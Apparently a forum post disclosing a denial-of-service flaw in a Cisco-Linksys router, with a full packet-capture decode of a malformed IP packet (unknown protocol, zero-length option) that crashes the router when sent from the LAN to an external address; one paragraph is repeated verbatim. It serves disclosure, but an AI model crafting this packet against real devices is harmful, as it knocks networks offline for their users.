I still havent tested the device from the WAN-side.
The packet does not crash the router if it is addressed to the router. To the crash the router (from the LAN-side, anyway), it must be addressed to an external (WAN-side) IP address.
example:
router is 192.168.1.1
evil_pc is 192.168.1.101 (evil_pc is a PC attached to one of the ethernet ports on the router.)
evil_pc sends the magic packet to ANY external IP address, for example, www.google.com. The router will then crash, and need to be rebooted.
magic packet:
No. Time Source Destination Protocol Info
11576 989.558120 192.168.1.101 67.8.x.x IP Unknown (0xaa)
The packet does not crash the router if it is addressed to the router. To the crash the router (from the LAN-side, anyway), it must be addressed to an external (WAN-side) IP address.
example:
router is 192.168.1.1
evil_pc is 192.168.1.101 (evil_pc is a PC attached to one of the ethernet ports on the router.)
evil_pc sends the magic packet to ANY external IP address, for example, www.google.com. The router will then crash, and need to be rebooted.
magic packet:
No. Time Source Destination Protocol Info
11576 989.558120 192.168.1.101 67.8.x.x IP Unknown (0xaa)
Frame 11576 (58 bytes on wire, 58 bytes captured)
Ethernet II, Src: 3com_cc:57:86 (00:10:5a:cc:57:86), Dst: Cisco-Li_99:a1:49 (00:0f:66:99:a1:49)
Destination: Cisco-Li_99:a1:49 (00:0f:66:99:a1:49)
Source: 3com_cc:57:86 (00:10:5a:cc:57:86)
Type: IP (0x0800)
Internet Protocol, Src: 192.168.1.101 (192.168.1.101), Dst: 67.8.x.x (67.8.x.x)
Version: 4
Header length: 24 bytes
Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
Total Length: 44
Identification: 0x04d2 (1234)
Flags: 0x00
Fragment offset: 0
Time to live: 255
Protocol: Unknown (0xaa)
Header checksum: 0x062a [correct]
Source: 192.168.1.101 (192.168.1.101)
Destination: 67.8.x.x (67.8.x.x)
Options: (4 bytes)
Unknown (0xe4) (with too-short option length = 0 bytes)
Data (20 bytes)
0000 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 ABCDEFGHIJKLMNOP
0010 52 53 54 55 RSTU
[ reply ]